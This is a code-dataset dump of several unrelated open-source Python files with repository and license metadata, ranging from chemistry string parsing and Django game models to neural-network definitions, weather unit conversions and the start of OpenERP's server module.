>>> tpl = extractLayers('InChI=1/2CH2O2/c2*2-1-3/h2*1H,(H,2,3)/i2+1;2-1/f/h2*2H/i3-1;2+1/o(1,2)')
>>> tpl.transposition
'o(1,2)'
Edge cases:
>>> tpl=extractLayers('InChI=1S/H2/h1H')
>>> tpl.start
'InChI=1S'
>>> tpl.formula
'H2'
>>> tpl.skeleton
''
>>> tpl.hydrogens
'h1H'
>>> tpl=extractLayers('InChI=1S/H')
>>> tpl.start
'InChI=1S'
>>> tpl.formula
'H'
>>> tpl.skeleton
''
>>> tpl.hydrogens
''
"""
match = coreExpr.match(inchi)
if not match:
return None
gps = list(match.groups())
res = []
for e in gps:
if not e:
res.append('')
elif e[0]=='/':
res.append(e[1:])
else:
res.append(e)
res = Layers(*res)
return res
if __name__=='__main__':
import doctest
doctest.testmod()
|
nbateshaus/chem-search
|
inchi-split/splitter.py
|
Python
|
bsd-3-clause
| 9,306 | 0.016548 |
# Copyright (C) 2016 Intel Corporation
# Released under the MIT license (see COPYING.MIT)
from functools import wraps
class OETestDecorator(object):
case = None # Reference of OETestCase decorated
attrs = None # Attributes to be loaded by decorator implementation
def __init__(self, *args, **kwargs):
if not self.attrs:
return
for idx, attr in enumerate(self.attrs):
attr_type = self.attrs[attr]
if attr in kwargs:
value = kwargs[attr]
else:
value = args[idx]
value_type = type(value)
if not value_type == attr_type:
class_name = self.__class__.__name__
raise TypeError("%s decorator attr %s expects argument %s"\
" received %s." % (class_name, attr, attr_type,
value_type))
setattr(self, attr, value)
def __call__(self, func):
@wraps(func)
def wrapped_f(*args, **kwargs):
self.attrs = self.attrs # XXX: Enables OETestLoader discover
return func(*args, **kwargs)
return wrapped_f
def bind(self, case):
self.case = case
self.case.decorators.append(self)
def setUp(self):
pass
from .depends import OETestDepends
from .oeid import OETestID
|
alimon/oeqa2
|
oeqa2/test/decorator/__init__.py
|
Python
|
mit
| 1,356 | 0.007375 |
# Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from core.models import Type, Location
from API.models import CorpAPIKey
from core.models import Corporation, Alliance
from Map.models import System
import csv
from django.contrib.auth.models import User
import pytz
class POS(models.Model):
"""Represents a POS somewhere in space."""
system = models.ForeignKey(System, related_name="poses")
planet = models.IntegerField()
moon = models.IntegerField()
towertype = models.ForeignKey(Type, related_name="inspace")
corporation = models.ForeignKey(Corporation, related_name="poses")
posname = models.CharField(max_length=100, blank=True, null=True)
fitting = models.TextField(blank=True, null=True)
#Using CCP's status codes here for sanity with API checks
status = models.IntegerField(choices = ((0, 'Unanchored'), (1, 'Anchored'),
(2, 'Onlining'), (3, 'Reinforced'), (4, 'Online')))
#This should be the time the tower exits RF
#TODO: add a validator to make sure this is only set if status = 3 (Reinforced)
rftime = models.DateTimeField(null=True, blank=True)
updated = models.DateTimeField()
# These values will be set by the TSV parser from d-scan data if available
guns = models.IntegerField(null=True, blank=True)
ewar = models.IntegerField(null=True, blank=True)
sma = models.IntegerField(null=True, blank=True)
hardener = models.IntegerField(null=True, blank=True)
# This is a short comment that is displayed as a warning
warpin_notice = models.CharField(blank=True, null=True, max_length=64)
class Meta:
ordering = ['system__name', 'planet', 'moon']
def clean(self):
from django.core.exceptions import ValidationError
if self.rftime and self.status != 3:
raise ValidationError("A POS cannot have an rftime unless it is reinforced")
def __unicode__(self):
return self.posname
#overide save to implement posname defaulting to towertype.name
def save(self, *args, **kwargs):
if not self.posname:
self.posname = self.towertype.name
# Ensure that any newline characters in fitting are changed to <br>
self.fitting = self.fitting.replace("\n", "<br />")
# Mark tower as having been updated
from datetime import datetime
import pytz
self.updated = datetime.now(pytz.utc)
super(POS, self).save(*args, **kwargs)
def size(self):
"""
Returns the size of the tower, Small Medium or Large.
"""
if u'Small' in self.towertype.name:
return u'Small'
if u'Medium' in self.towertype.name:
return u'Medium'
return u'Large'
def fit_from_dscan(self, dscan):
"""
Fills in a POS's fitting from a copy / paste of d-scan results.
"""
import csv
from core.models import Type
itemDict={}
# marketGroupIDs to consider guns, ewar, hardeners, and smas
gunsGroups = [480, 479, 594, 595, 596]
ewarGroups = [481, 1009]
smaGroups = [484,]
hardenerGroups = [485,]
towers = 0
self.sma = 0
self.hardener = 0
self.guns = 0
self.ewar = 0
for row in csv.reader(dscan.splitlines(), delimiter="\t"):
itemType = Type.objects.get(name=row[1])
if itemType.marketgroup:
groupTree = []
parent = itemType.marketgroup
while parent:
groupTree.append(parent.id)
parent = parent.parentgroup
if itemType.marketgroup.id in gunsGroups:
self.guns += 1
if itemType.marketgroup.id in ewarGroups:
self.ewar += 1
if itemType.marketgroup.id in smaGroups:
self.sma += 1
if itemType.marketgroup.id in hardenerGroups:
self.hardener += 1
if itemType.marketgroup.id == 478:
towers += 1
if itemDict.has_key(itemType.name):
itemDict[itemType.name] += 1
elif 1285 in groupTree and 478 not in groupTree:
itemDict.update({itemType.name: 1})
self.fitting = "Imported from D-Scan:\n"
for itemtype in itemDict:
self.fitting += "\n%s : %s" % (itemtype, itemDict[itemtype])
if towers <= 1:
self.save()
else:
raise AttributeError('Too many towers detected in the D-Scan!')
class CorpPOS(POS):
"""A corp-controlled POS with manager and password data."""
manager = models.ForeignKey(User, null=True, blank=True, related_name='poses')
password = models.CharField(max_length=100)
description = models.TextField(null=True, blank=True)
#Let's store the CCP Item ID for the tower here to make API lookup easier
#If it is null, then we are not tracking this POS via API
apiitemid = models.BigIntegerField(null=True, blank=True)
apikey = models.ForeignKey(CorpAPIKey, null=True, blank=True, related_name='poses')
class Meta:
permissions = (('can_see_pos_pw', 'Can see corp POS passwords.'),
('can_see_all_pos', 'Sees all corp POSes regardless of manager.'),)
class POSApplication(models.Model):
"""Represents an application for a personal POS."""
applicant = models.ForeignKey(User, null=True, blank=True, related_name='posapps')
towertype = models.ForeignKey(Type, null=True, blank=True, related_name='posapps')
residents = models.ManyToManyField(User)
normalfit = models.TextField()
siegefit = models.TextField()
#Once it is approved, we will fill in these two to tie the records together
approved = models.DateTimeField(blank=True, null=True)
posrecord = models.ForeignKey(CorpPOS, blank=True, null=True, related_name='application')
class Meta:
permissions = (('can_close_pos_app', 'Can dispose of corp POS applications.'),)
def __unicode__(self):
return 'Applicant: %s Tower: %s' % (self.applicant.username, self.towertype.name)
class POSVote(models.Model):
"""Represents a vote on a personal POS application."""
application = models.ForeignKey(POSApplication, related_name='votes')
voter = models.ForeignKey(User, related_name='posvotes')
vote = models.IntegerField(choices=((0,'Deny'), (1, 'Approve'), (2, 'Abstain')))
|
djrscally/eve-wspace
|
evewspace/POS/models.py
|
Python
|
gpl-3.0
| 7,280 | 0.003846 |
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from collections import OrderedDict
from functools import partial
from torch import nn
from nupic.research.frameworks.pytorch.modules import KWinners2dLocal
from nupic.torch.modules import Flatten, KWinners, KWinners2d
__all__ = [
"AlexNetKWinners",
"gsc_alexnet_kwinners",
]
class AlexNetKWinners(nn.Sequential):
def __init__(self,
input_size,
num_classes,
cnn_out_channels=(64, 64),
cnn_activity_percent_on=(0.095, 0.125),
linear_units=1000,
linear_activity_percent_on=(0.1,),
kernel_size=5,
maxpool_stride=2,
boost_strength=1.5,
boost_strength_factor=0.9,
duty_cycle_period=1000,
k_inference_factor=1.0,
use_kwinners_local=False):
feature_map_sidelength = (
(((input_size[1] - kernel_size + 1) / maxpool_stride)
- kernel_size + 1) / maxpool_stride
)
assert(feature_map_sidelength == int(feature_map_sidelength))
feature_map_sidelength = int(feature_map_sidelength)
kwinner2d_class = KWinners2dLocal if use_kwinners_local else KWinners2d
super().__init__(OrderedDict([
# -------------
# Conv Block
# -------------
("cnn1", nn.Conv2d(input_size[0],
cnn_out_channels[0],
kernel_size)),
("cnn1_maxpool", nn.MaxPool2d(maxpool_stride)),
("cnn1_bn", nn.BatchNorm2d(cnn_out_channels[0],
affine=False)),
("cnn1_kwinner", kwinner2d_class(
channels=cnn_out_channels[0],
percent_on=cnn_activity_percent_on[0],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
# -------------
# Conv Block
# -------------
("cnn2", nn.Conv2d(cnn_out_channels[0],
cnn_out_channels[1],
kernel_size)),
("cnn2_maxpool", nn.MaxPool2d(maxpool_stride)),
("cnn2_bn", nn.BatchNorm2d(cnn_out_channels[1],
affine=False)),
("cnn2_kwinner", kwinner2d_class(
channels=cnn_out_channels[1],
percent_on=cnn_activity_percent_on[1],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
("flatten", Flatten()),
# -------------
# Linear Block
# -------------
("fc1", nn.Linear(
(feature_map_sidelength**2) * cnn_out_channels[1],
linear_units)),
("fc1_bn", nn.BatchNorm1d(linear_units, affine=False)),
("fc1_kwinner", KWinners(
n=linear_units,
percent_on=linear_activity_percent_on[0],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
("fc1_dropout", nn.Dropout(0.5)),
# -------------
# Output Layer
# -------------
("fc2", nn.Linear(linear_units,
num_classes)),
]))
gsc_alexnet_kwinners = partial(AlexNetKWinners,
input_size=(1, 32, 32),
num_classes=12,
cnn_activity_percent_on=(0.095, 0.125),
linear_activity_percent_on=(0.1,),
boost_strength=1.5,
boost_strength_factor=0.9,
duty_cycle_period=1000,
k_inference_factor=1.0)
|
mrcslws/nupic.research
|
packages/backprop_structure/src/nupic/research/frameworks/backprop_structure/networks/alexnet_kwinners.py
|
Python
|
agpl-3.0
| 5,250 | 0 |
try:
from astropy.models import ParametricModel,Parameter,_convert_input,_convert_output
import numpy as np
class PowerLawModel(ParametricModel):
param_names = ['scale', 'alpha']
def __init__(self, scale, alpha, param_dim=1):
self._scale = Parameter(name='scale', val=scale, mclass=self, param_dim=param_dim)
self._alpha = Parameter(name='alpha', val=alpha, mclass=self, param_dim=param_dim)
super(ParametricModel,self).__init__(self, self.param_names, ndim=1, outdim=1, param_dim=param_dim)
self.linear = False
self.deriv = None
def eval(self, xvals, params):
return params[0]*((xvals)**(-params[1]))
def noderiv(self, params, xvals, yvals):
deriv_dict = {
'scale': ((xvals)**(-params[1])),
'alpha': params[0]*((xvals)**(-params[1]))*np.log(xvals)}
derivval = [deriv_dict[par] for par in self.param_names]
return np.array(derivval).T
def __call__(self, x):
"""
Transforms data using this model.
Parameters
--------------
x : array, of minimum dimensions 1
Notes
-----
See the module docstring for rules for model evaluation.
"""
x, fmt = _convert_input(x, self.param_dim)
result = self.eval(x, self.param_sets)
return _convert_output(result, fmt)
except ImportError:
pass
|
vlas-sokolov/pyspeckit
|
pyspeckit/spectrum/models/astropy_models.py
|
Python
|
mit
| 1,575 | 0.008889 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-"""
# Temperature conversion constants
KELVIN_OFFSET = 273.15
FAHRENHEIT_OFFSET = 32.0
FAHRENHEIT_DEGREE_SCALE = 1.8
# Wind speed conversion constants
MILES_PER_HOUR_FOR_ONE_METER_PER_SEC = 2.23694
KM_PER_HOUR_FOR_ONE_METER_PER_SEC = 3.6
KNOTS_FOR_ONE_METER_PER_SEC = 1.94384
# Barometric conversion constants
HPA_FOR_ONE_INHG = 33.8639
# Visibility distance conversion constants
MILE_FOR_ONE_METER = 0.000621371
KMS_FOR_ONE_METER = .001
# Decimal precision
ROUNDED_TO = 2
def kelvin_dict_to(d, target_temperature_unit):
"""
Converts all the values in a dict from Kelvin temperatures to the
specified temperature format.
:param d: the dictionary containing Kelvin temperature values
:type d: dict
:param target_temperature_unit: the target temperature unit, may be:
'celsius' or 'fahrenheit'
:type target_temperature_unit: str
:returns: a dict with the same keys as the input dict and converted
temperature values as values
:raises: *ValueError* when unknown target temperature units are provided
"""
if target_temperature_unit == 'kelvin':
return d
elif target_temperature_unit == 'celsius':
return {key: kelvin_to_celsius(d[key]) for key in d}
elif target_temperature_unit == 'fahrenheit':
return {key: kelvin_to_fahrenheit(d[key]) for key in d}
else:
raise ValueError("Invalid value for target temperature conversion \
unit")
def kelvin_to_celsius(kelvintemp):
"""
Converts a numeric temperature from Kelvin degrees to Celsius degrees
:param kelvintemp: the Kelvin temperature
:type kelvintemp: int/long/float
:returns: the float Celsius temperature
:raises: *TypeError* when bad argument types are provided
"""
if kelvintemp < 0:
raise ValueError(__name__ +
": negative temperature values not allowed")
celsiustemp = kelvintemp - KELVIN_OFFSET
return float("{0:.2f}".format(celsiustemp))
def kelvin_to_fahrenheit(kelvintemp):
"""
Converts a numeric temperature from Kelvin degrees to Fahrenheit degrees
:param kelvintemp: the Kelvin temperature
:type kelvintemp: int/long/float
:returns: the float Fahrenheit temperature
:raises: *TypeError* when bad argument types are provided
"""
if kelvintemp < 0:
raise ValueError(__name__ +
": negative temperature values not allowed")
fahrenheittemp = (kelvintemp - KELVIN_OFFSET) * \
FAHRENHEIT_DEGREE_SCALE + FAHRENHEIT_OFFSET
return float("{0:.2f}".format(fahrenheittemp))
def metric_wind_dict_to_imperial(d):
"""
Converts all the wind values in a dict from meters/sec (metric measurement
system) to miles/hour (imperial measurement system)
.
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to miles/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * MILES_PER_HOUR_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_km_h(d):
"""
Converts all the wind values in a dict from meters/sec
to km/hour.
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to km/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * KM_PER_HOUR_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_knots(d):
"""
Converts all the wind values in a dict from meters/sec
to knots
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to km/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * KNOTS_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_beaufort(d):
"""
Converts all the wind values in a dict from meters/sec
to the corresponding Beaufort scale level (which is not an exact number but rather
represents a range of wind speeds - see: https://en.wikipedia.org/wiki/Beaufort_scale).
Conversion table: https://www.windfinder.com/wind/windspeed.htm
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to Beaufort level
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
if value <= 0.2:
bf = 0
elif 0.2 < value <= 1.5:
bf = 1
elif 1.5 < value <= 3.3:
bf = 2
elif 3.3 < value <= 5.4:
bf = 3
elif 5.4 < value <= 7.9:
bf = 4
elif 7.9 < value <= 10.7:
bf = 5
elif 10.7 < value <= 13.8:
bf = 6
elif 13.8 < value <= 17.1:
bf = 7
elif 17.1 < value <= 20.7:
bf = 8
elif 20.7 < value <= 24.4:
bf = 9
elif 24.4 < value <= 28.4:
bf = 10
elif 28.4 < value <= 32.6:
bf = 11
else:
bf = 12
result[key] = bf
else:
result[key] = value
return result
def metric_pressure_dict_to_inhg(d):
"""
Converts all barometric pressure values in a dict to "inches of mercury."
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to "Hg or inHg (inches of mercury)
Note what OWM says about pressure: "Atmospheric pressure [is given in hPa]
(on the sea level, if there is no sea_level or grnd_level data)"
"""
result = dict()
for key, value in d.items():
if value is None:
continue
result[key] = round((value / HPA_FOR_ONE_INHG), ROUNDED_TO)
return result
def visibility_distance_to(v, target_visibility_unit='kilometers'):
"""
Converts visibility distance (in meters) to kilometers or miles
Defaults to kilometer conversion
:param distance: the value of visibility_distance
:type distance: int
:param target_visibility_unit: the unit of conversion
:type target_visibility_unit: str
:returns: a converted value for visibility_distance (float)
"""
if v is None:
return v
if target_visibility_unit == 'kilometers':
const = KMS_FOR_ONE_METER
elif target_visibility_unit == 'miles':
const = MILE_FOR_ONE_METER
else:
raise ValueError('Invalid value for target visibility distance unit')
return round(v * const, ROUNDED_TO)
|
csparpa/pyowm
|
pyowm/utils/measurables.py
|
Python
|
mit
| 7,259 | 0.000276 |
from decimal import Decimal
import re
import web
r_row = re.compile(r'<tr>(.*?)</tr>', re.S)
r_td = re.compile(r'<td v[^>]+>([^<]*)</td>')
r_member = re.compile(r'member=([^"]+)">([^<]+)<')
def fixdec(d):
d = d.strip()
return Decimal(d) and Decimal(d)/100
def parse_doc(d):
for row in r_row.findall(d):
out = r_td.findall(row)
if out:
dist, membername = r_member.findall(row)[0]
dist = dist.replace('At Large', '00')
dist = dist[:2] + '-' + dist[2:].zfill(2)
s = web.storage()
s.district = dist
s.progressive2008 = fixdec(out[0])
s.chips2008 = fixdec(out[1])
s.progressiveall = fixdec(out[3])
s.name = membername.decode('iso-8859-1')
yield s
def parse_all():
d = file('../data/crawl/punch/house.html').read()
for x in parse_doc(d): yield x
d = file('../data/crawl/punch/senate.html').read()
for x in parse_doc(d): yield x
if __name__ == "__main__":
import tools
tools.export(parse_all())
|
aaronsw/watchdog
|
import/parse/punch.py
|
Python
|
agpl-3.0
| 1,090 | 0.008257 |
from django.core.management.base import BaseCommand
from milkyway.models import Challenge, Hint, Category, Flag
import yaml
class Command(BaseCommand):
help = 'Load data from yaml file'
def add_arguments(self, parser):
parser.add_argument('dataset', type=str)
def handle(self, *args, **options):
with open(options['dataset'], 'r') as handle:
data = yaml.load(handle)
Category.objects.all().delete()
for cat in data['chals']:
category = Category.objects.create(
name=cat['name'],
description=cat['desc']
)
for chal in cat['chals']:
chal_data = {
'id': chal['id'],
'name': chal['name'],
'description': chal['desc'],
'value': chal['value'],
'category': category,
'lesson': chal.get('lesson', ''),
}
c = Challenge.objects.create(**chal_data)
for hint in chal['hints']:
Hint.objects.create(text=hint, chal=c, show=False)
c.save()
for flag in chal['flags']:
Flag.objects.create(
chal=c,
flag=flag['flag'],
flag_is_regex=flag['regex'],
)
|
galaxy-ctf/milky-way
|
milkyway/management/commands/load_chals.py
|
Python
|
agpl-3.0
| 1,410 | 0 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classification metrics library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
# TODO(nsilberman): move into metrics/python/ops/
def accuracy(predictions, labels, weights=None):
"""Computes the percentage of times that predictions matches labels.
Args:
predictions: the predicted values, a `Tensor` whose dtype and shape
matches 'labels'.
labels: the ground truth values, a `Tensor` of any shape and
integer or string dtype.
weights: None or `Tensor` of float values to reweight the accuracy.
Returns:
Accuracy `Tensor`.
Raises:
ValueError: if dtypes don't match or
if dtype is not integer or string.
"""
if not (labels.dtype.is_integer or labels.dtype == dtypes.string):
raise ValueError('Labels should have integer or string dtype. '
'Given: %s' % str(labels.dtype))
if not labels.dtype.is_compatible_with(predictions.dtype):
raise ValueError('Dtypes of predictions and labels should match. '
'Given: predictions (%s) and labels (%s)' %
(str(predictions.dtype), str(labels.dtype)))
with ops.op_scope([predictions, labels], 'accuracy'):
is_correct = math_ops.cast(
math_ops.equal(predictions, labels), dtypes.float32)
if weights is not None:
is_correct = math_ops.mul(is_correct, weights)
return math_ops.reduce_mean(is_correct)
|
HaebinShin/tensorflow
|
tensorflow/contrib/metrics/python/metrics/classification.py
|
Python
|
apache-2.0
| 2,307 | 0.002167 |
#-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import psutil
import random
import resource
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import werkzeug.serving
try:
import fcntl
except ImportError:
pass
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import openerp
import openerp.tools.config as config
from openerp.release import nt_service_name
from openerp.tools.misc import stripped_sys_argv, dumpstacks
import wsgi_server
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
def memory_info(process):
""" psutil < 2.0 does not have memory_info, >= 3.0 does not have
get_memory_info """
pmem = (getattr(process, 'memory_info', None) or process.get_memory_info)()
return (pmem.rss, pmem.vms)
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class BaseWSGIServerNoBind(werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
use this class, sets the socket and calls the process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "1", "1", app)
def server_bind(self):
# we dont bind beause we use the listen socket of PreforkServer#socket
# instead we close the socket
if self.socket:
self.socket.close()
def server_activate(self):
# dont listen as we use PreforkServer#socket
pass
# _reexec() should set LISTEN_* to avoid connection refused during reload time. It
# should also work with systemd socket activation. This is currently untested
# and not yet used.
class ThreadedWSGIServerReloadable(werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environement, this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def server_bind(self):
envfd = os.environ.get('LISTEN_FDS')
if envfd and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(int(envfd), socket.AF_INET, socket.SOCK_STREAM)
# should we os.close(int(envfd)) ? it seem python duplicate the fd.
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
def server_activate(self):
if not self.reload_socket:
super(ThreadedWSGIServerReloadable, self).server_activate()
#----------------------------------------------------------
# AutoReload watcher
#----------------------------------------------------------
class AutoReload(object):
def __init__(self, server):
self.server = server
self.files = {}
self.modules = {}
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, autoreload):
self.autoreload = autoreload
def process_IN_CREATE(self, event):
_logger.debug('File created: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
def process_IN_MODIFY(self, event):
_logger.debug('File modified: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
self.wm = pyinotify.WatchManager()
self.handler = EventHandler(self)
self.notifier = pyinotify.Notifier(self.wm, self.handler, timeout=0)
mask = pyinotify.IN_MODIFY | pyinotify.IN_CREATE # IN_MOVED_FROM, IN_MOVED_TO ?
for path in openerp.tools.config.options["addons_path"].split(','):
_logger.info('Watching addons folder %s', path)
self.wm.add_watch(path, mask, rec=True)
def process_data(self, files):
xml_files = [i for i in files if i.endswith('.xml')]
addons_path = openerp.tools.config.options["addons_path"].split(',')
for i in xml_files:
for path in addons_path:
if i.startswith(path):
# find out wich addons path the file belongs to
# and extract it's module name
right = i[len(path) + 1:].split('/')
if len(right) < 2:
continue
module = right[0]
self.modules[module]=1
if self.modules:
_logger.info('autoreload: xml change detected, autoreload activated')
restart()
def process_python(self, files):
# process python changes
py_files = [i for i in files if i.endswith('.py')]
py_errors = []
# TODO keep python errors until they are ok
if py_files:
for i in py_files:
try:
source = open(i, 'rb').read() + '\n'
compile(source, i, 'exec')
except SyntaxError:
py_errors.append(i)
if py_errors:
_logger.info('autoreload: python code change detected, errors found')
for i in py_errors:
_logger.info('autoreload: SyntaxError %s',i)
else:
_logger.info('autoreload: python code updated, autoreload activated')
restart()
def check_thread(self):
# Check if some files have been touched in the addons path.
# If true, check if the touched file belongs to an installed module
# in any of the database used in the registry manager.
while 1:
while self.notifier.check_events(1000):
self.notifier.read_events()
self.notifier.process_events()
l = self.files.keys()
self.files.clear()
self.process_data(l)
self.process_python(l)
def run(self):
t = threading.Thread(target=self.check_thread)
t.setDaemon(True)
t.start()
_logger.info('AutoReload watcher running')
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
# TODO Change the xmlrpc_* options to http_*
self.app = app
# config
self.interface = config['xmlrpc_interface'] or '0.0.0.0'
self.port = config['xmlrpc_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error, e:
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT,signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
# logging.shutdown was already called at this point.
sys.stderr.write("Forced shutdown.\n")
os._exit(0)
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
self.quit_signals_received += 1
def cron_thread(self, number):
while True:
time.sleep(SLEEP_INTERVAL + number) # Steve Reich timing style
registries = openerp.modules.registry.RegistryManager.registries
_logger.debug('cron%d polling for jobs', number)
for db_name, registry in registries.items():
while True and registry.ready:
acquired = openerp.addons.base.ir.ir_cron.ir_cron._acquire_job(db_name)
if not acquired:
break
def cron_spawn(self):
""" Start the above runner function in a daemon thread.
The thread is a typical daemon thread: it will never quit and must be
terminated when the main process exits - with no consequence (the processing
threads it spawns are not marked daemon).
"""
# Force call to strptime just before starting the cron thread
# to prevent time.strptime AttributeError within the thread.
# See: http://bugs.python.org/issue7980
datetime.datetime.strptime('2012-01-01', '%Y-%m-%d')
for i in range(openerp.tools.config['max_cron_threads']):
def target():
self.cron_thread(i)
t = threading.Thread(target=target, name="openerp.service.cron.cron%d" % i)
t.setDaemon(True)
t.start()
_logger.debug("cron%d started!" % i)
def http_thread(self):
def app(e,s):
return self.app(e,s)
self.httpd = ThreadedWSGIServerReloadable(self.interface, self.port, app)
self.httpd.serve_forever()
def http_spawn(self):
threading.Thread(target=self.http_thread).start()
_logger.info('HTTP service (werkzeug) running on %s:%s', self.interface, self.port)
def start(self):
_logger.debug("Setting signal handlers")
if os.name == 'posix':
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
elif os.name == 'nt':
import win32api
win32api.SetConsoleCtrlHandler(lambda sig: signal_handler(sig, None), 1)
self.cron_spawn()
self.http_spawn()
def stop(self):
""" Shutdown the WSGI server. Wait for non deamon threads.
"""
_logger.info("Initiating shutdown")
_logger.info("Hit CTRL-C again or send a second signal to force the shutdown.")
self.httpd.shutdown()
self.close_socket(self.httpd.socket)
# Manually join() all threads before calling sys.exit() to allow a second signal
# to trigger _force_quit() in case some non-daemon threads won't exit cleanly.
# threading.Thread.join() should not mask signals (at least in python 2.5).
me = threading.currentThread()
_logger.debug('current thread: %r', me)
for thread in threading.enumerate():
_logger.debug('process %r (%r)', thread, thread.isDaemon())
if thread != me and not thread.isDaemon() and thread.ident != self.main_thread_id:
while thread.isAlive():
_logger.debug('join and sleep')
# Need a busyloop here as thread.join() masks signals
# and would prevent the forced shutdown.
thread.join(0.05)
time.sleep(0.05)
_logger.debug('--')
openerp.modules.registry.RegistryManager.delete_all()
logging.shutdown()
def run(self):
""" Start the http server and the cron thread then wait for a signal.
The first SIGINT or SIGTERM signal will initiate a graceful shutdown while
a second one if any will force an immediate exit.
"""
self.start()
# Wait for a first signal to be handled. (time.sleep will be interrupted
# by the signal handler.) The try/except is for the win32 case.
try:
while self.quit_signals_received == 0:
time.sleep(60)
except KeyboardInterrupt:
pass
self.stop()
def reload(self):
os.kill(self.pid, signal.SIGHUP)
class GeventServer(CommonServer):
def __init__(self, app):
super(GeventServer, self).__init__(app)
self.port = config['longpolling_port']
self.httpd = None
def watch_parent(self, beat=4):
import gevent
ppid = os.getppid()
while True:
if ppid != os.getppid():
pid = os.getpid()
_logger.info("LongPolling (%s) Parent changed", pid)
